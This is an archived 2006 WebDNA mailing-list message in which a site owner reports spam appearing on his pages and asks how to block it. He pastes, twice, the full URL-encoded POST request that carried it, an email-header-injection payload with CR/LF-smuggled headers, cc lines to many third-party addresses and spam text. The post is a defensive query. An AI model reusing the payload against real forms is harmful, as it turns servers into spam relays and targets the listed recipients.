SPAM attempts through WebDNA (Was Serious WebDNA Issue)

This WebDNA talk-list message is from

2006


It keeps the original formatting.
numero = 68178
interpreted = N
texte = Doing some more research on this, I've tracked down the request that sent this data to my site. It was POSTed directly to my search results page using expected variables - full details shown below. It sent it's SPAM message in the Cart field, and then sent "a5042%40popxpress.com" as the value for the remainder of the fields that should have been present - although several were actually missing. The effect of this was that the SPAM content of this request then appeared to have been cached by WebDNA and was displayed several times in place of an [Include] file - throwing this up on pages displayed to customers on a totally different WebDNA site running on the same server - this continued until the server was restarted. Two questions (1) How can I block this happening witgh a Mod Rewrite? (2) Why is WebDNA caching this data? I understand that they're hoping my server will send this message out when it processes the request, but I'm confused to the reasons for replacing the rest of the variable values with "a5042%40popxpress.com", what is this supposed to achieve? http://www.popxpress.com/ /result.tpl cart=biotics%0D%0AContent-Type%3A+multipart%2Falternative%3B+%0A++++++++++++++boundary%3Dc286c15078fef19919450df6f8510b92%0AX-Mailer%3A+GoldMine+%5B5.50.10111%5D%0ASubject%3A+can+be%0Acc%3A+homejspoljar%40aol.com%0Acc%3A+ca23comerww%40aol.com%0Acc%3A+lostsurfer4life%40aol.com%0Acc%3A+fkuntz7575%40aol.com%0Acc%3A+doggybone174%40aol.com%0Acc%3A+sweetjlf%40aol.com%0Acc%3A+ringoent%40aol.com%0Acc%3A+snowmeow98%40aol.com%0Acc%3A+topcopl2%40aol.com%0Acc%3A+dcpsychomunky%40aol.com%0Acc%3A+felix1484860273%40aol.com%0A%0A--c286c15078fef19919450df6f8510b92%0AContent-Transfer-Encoding%3A+7bit%0AContent-Type%3A+text%2Fplain%0A%0Anot+come+from+surface+contact.+n+fact%0A%0A--c286c15078fef19919450df6f8510b92%0AContent-Transfer-Encoding%3A+8bit%0AContent-Type%3A+text%2Fplain%0A%0Aa+gammon+joint.+ashers+of+bacon+are+a+main+constituent+of+the+traditional+%0Arish+breakfast%2C+along+with+sausages.+lthough+ritain+has+a+large+pork+and+%0Abacon+industry%2C+much+of+the+bacon+consumed+in+ritain+is+produced+in+enmark%2C+%0Aand+marketed+as+anish+bacon+%28the+word+anish+is+stamped+on%0A%0A--c286c15078fef19919450df6f8510b92--%0A.%0A&startat=a5042%40popxpress.com&max=a5042%40popxpress.com&Submit=a5042%40popxpress.com&wagroup1data=a5042%40popxpress.com&link=a5042%40popxpress.com&SortOrder=a5042%40popxpress.com&listing=a5042%40popxpress.com&allreqd=a5042%40popxpress.com&group1field=a5042%40popxpress.comREFERER=http%3A//www.popxpress.com/&HOST=www.popxpress.com&CONTENT-TYPE=application/x-www-form-urlencoded&CONNECTION=Keep-Alive&CONTENT-LENGTH=1394&CONNECTION=close& On Tue, 21 Nov 2006 10:18:26 +0000 Mark Derrick wrote: > I seem to be having a very similar problem, but with a slight twist > > Last night, the following text was served in the place of an included txt >file. > > : sweetjlf@aol.comcc: ringoent@aol.comcc: snowmeow98@aol.comcc: > topcopl2@aol.comcc: dcpsychomunky@aol.comcc: felix1484860273@aol.com-- >c286c15078fef19919450df6f8510b92Content-Transfer-Encoding: 7bitContent-Type: >text/plainnot come from surface contact. n fact-- >c286c15078fef19919450df6f8510b92Content-Transfer-Encoding: 8bitContent-Type: >text/plaina gammon joint. ashers of bacon are a main constituent of the >traditional rish breakfast, along with sausages. lthough ritain has a large >pork and bacon industry, much of the bacon consumed in ritain is produced in >enmark, and marketed as anish bacon (the word anish is stamped on-- >c286c15078fef19919450df6f8510b92--. > > The rest of the page was fine, but where [INCLUDE file=^includes/ >sample.txt] was supposed to go, this text appeared instead. > > The text file which should have been included has not changed at all, and >is now appearing correctly. > Because of this, I cannot see any reason why the above text was displayed. > > It's obviously someone trying to send Spam through our server - but why it >has appeared within a page is seriously worrying me. > Is WebDNA caching this data and somehow then using it when calling an > [include] to build a page? > > Generally people can try to send spam through my server all they want, >because I know the server is well protected against such behaviour - but >after seeing text like this appearing within my pages, I'm now starting to >seriously worry about WebDNA's security. > > > Thanks for any help you can offer. > > Mark. > > ------------------------------------------------------------- > This message is sent to you because you are subscribed to > the mailing list . > To unsubscribe, E-mail to: > To switch to the DIGEST mode, E-mail to > > Web Archive of this list is at: http://webdna.smithmicro.com/ ------------------------------------------------------------- This message is sent to you because you are subscribed to the mailing list . To unsubscribe, E-mail to: To switch to the DIGEST mode, E-mail to Web Archive of this list is at: http://webdna.smithmicro.com/ Associated Messages, from the most recent to the oldest:

    
  1. Re: SPAM attempts through WebDNA (Was Serious WebDNA Issue) ( Mark Derrick 2006)
  2. Re: SPAM attempts through WebDNA (Was Serious WebDNA Issue) ( "sal danna" 2006)
  3. SPAM attempts through WebDNA (Was Serious WebDNA Issue) ( "Mark Derrick" 2006)
Doing some more research on this, I've tracked down the request that sent this data to my site. It was POSTed directly to my search results page using expected variables - full details shown below. It sent it's SPAM message in the Cart field, and then sent "a5042%40popxpress.com" as the value for the remainder of the fields that should have been present - although several were actually missing. The effect of this was that the SPAM content of this request then appeared to have been cached by WebDNA and was displayed several times in place of an [include] file - throwing this up on pages displayed to customers on a totally different WebDNA site running on the same server - this continued until the server was restarted. Two questions (1) How can I block this happening witgh a Mod Rewrite? (2) Why is WebDNA caching this data? I understand that they're hoping my server will send this message out when it processes the request, but I'm confused to the reasons for replacing the rest of the variable values with "a5042%40popxpress.com", what is this supposed to achieve? http://www.popxpress.com/ /result.tpl cart=biotics%0D%0AContent-Type%3A+multipart%2Falternative%3B+%0A++++++++++++++boundary%3Dc286c15078fef19919450df6f8510b92%0AX-Mailer%3A+GoldMine+%5B5.50.10111%5D%0ASubject%3A+can+be%0Acc%3A+homejspoljar%40aol.com%0Acc%3A+ca23comerww%40aol.com%0Acc%3A+lostsurfer4life%40aol.com%0Acc%3A+fkuntz7575%40aol.com%0Acc%3A+doggybone174%40aol.com%0Acc%3A+sweetjlf%40aol.com%0Acc%3A+ringoent%40aol.com%0Acc%3A+snowmeow98%40aol.com%0Acc%3A+topcopl2%40aol.com%0Acc%3A+dcpsychomunky%40aol.com%0Acc%3A+felix1484860273%40aol.com%0A%0A--c286c15078fef19919450df6f8510b92%0AContent-Transfer-Encoding%3A+7bit%0AContent-Type%3A+text%2Fplain%0A%0Anot+come+from+surface+contact.+n+fact%0A%0A--c286c15078fef19919450df6f8510b92%0AContent-Transfer-Encoding%3A+8bit%0AContent-Type%3A+text%2Fplain%0A%0Aa+gammon+joint.+ashers+of+bacon+are+a+main+constituent+of+the+traditional+%0Arish+breakfast%2C+along+with+sausages.+lthough+ritain+has+a+large+pork+and+%0Abacon+industry%2C+much+of+the+bacon+consumed+in+ritain+is+produced+in+enmark%2C+%0Aand+marketed+as+anish+bacon+%28the+word+anish+is+stamped+on%0A%0A--c286c15078fef19919450df6f8510b92--%0A.%0A&startat=a5042%40popxpress.com&max=a5042%40popxpress.com&Submit=a5042%40popxpress.com&wagroup1data=a5042%40popxpress.com&link=a5042%40popxpress.com&SortOrder=a5042%40popxpress.com&listing=a5042%40popxpress.com&allreqd=a5042%40popxpress.com&group1field=a5042%40popxpress.comREFERER=http%3A//www.popxpress.com/&HOST=www.popxpress.com&CONTENT-TYPE=application/x-www-form-urlencoded&CONNECTION=Keep-Alive&CONTENT-LENGTH=1394&CONNECTION=close& On Tue, 21 Nov 2006 10:18:26 +0000 Mark Derrick wrote: > I seem to be having a very similar problem, but with a slight twist > > Last night, the following text was served in the place of an included txt >file. > > : sweetjlf@aol.comcc: ringoent@aol.comcc: snowmeow98@aol.comcc: > topcopl2@aol.comcc: dcpsychomunky@aol.comcc: felix1484860273@aol.com-- >c286c15078fef19919450df6f8510b92Content-Transfer-Encoding: 7bitContent-Type: >text/plainnot come from surface contact. n fact-- >c286c15078fef19919450df6f8510b92Content-Transfer-Encoding: 8bitContent-Type: >text/plaina gammon joint. ashers of bacon are a main constituent of the >traditional rish breakfast, along with sausages. lthough ritain has a large >pork and bacon industry, much of the bacon consumed in ritain is produced in >enmark, and marketed as anish bacon (the word anish is stamped on-- >c286c15078fef19919450df6f8510b92--. > > The rest of the page was fine, but where [INCLUDE file=^includes/ >sample.txt] was supposed to go, this text appeared instead. > > The text file which should have been included has not changed at all, and >is now appearing correctly. > Because of this, I cannot see any reason why the above text was displayed. > > It's obviously someone trying to send Spam through our server - but why it >has appeared within a page is seriously worrying me. > Is WebDNA caching this data and somehow then using it when calling an > [include] to build a page? > > Generally people can try to send spam through my server all they want, >because I know the server is well protected against such behaviour - but >after seeing text like this appearing within my pages, I'm now starting to >seriously worry about WebDNA's security. > > > Thanks for any help you can offer. > > Mark. > > ------------------------------------------------------------- > This message is sent to you because you are subscribed to > the mailing list . > To unsubscribe, E-mail to: > To switch to the DIGEST mode, E-mail to > > Web Archive of this list is at: http://webdna.smithmicro.com/ ------------------------------------------------------------- This message is sent to you because you are subscribed to the mailing list . To unsubscribe, E-mail to: To switch to the DIGEST mode, E-mail to Web Archive of this list is at: http://webdna.smithmicro.com/ "Mark Derrick"

DOWNLOAD WEBDNA NOW!

Top Articles:

Talk List

The WebDNA community talk-list is the best place to get some help: several hundred extremely proficient programmers with an excellent knowledge of WebDNA and an excellent spirit will deliver all the tips and tricks you can imagine...

Related Readings:

RE: [WebDNA] COMMITDATABASE in linux unix 64bits FastCGI version 8.6 (2020) [OT] Colored source code in IE? (2007) WCf2 and nested tags (1997) Secure Server (1997) Plain Language Manual? (1998) Searching a field and returning the highest value (1997) Setting up Webmerchant.... (1999) Nested Loops and SHOWIFs (1997) [WebDNA] Resolve IP to Domain (2018) HTML file size limit (1998) Hiding Email Addresses (2003) cart (1997) InSecureTextVariables.... (2000) Help! WebCat2 bug (1997) bug in [SendMail] (1997) Date subtraction (2002) WebCat2b13MacPlugIn - syntax to convert date (1997) [WebDNA] [OT] economical reliable SSL certs? (2009) Searching multiple fields (1997) Keep away (1997)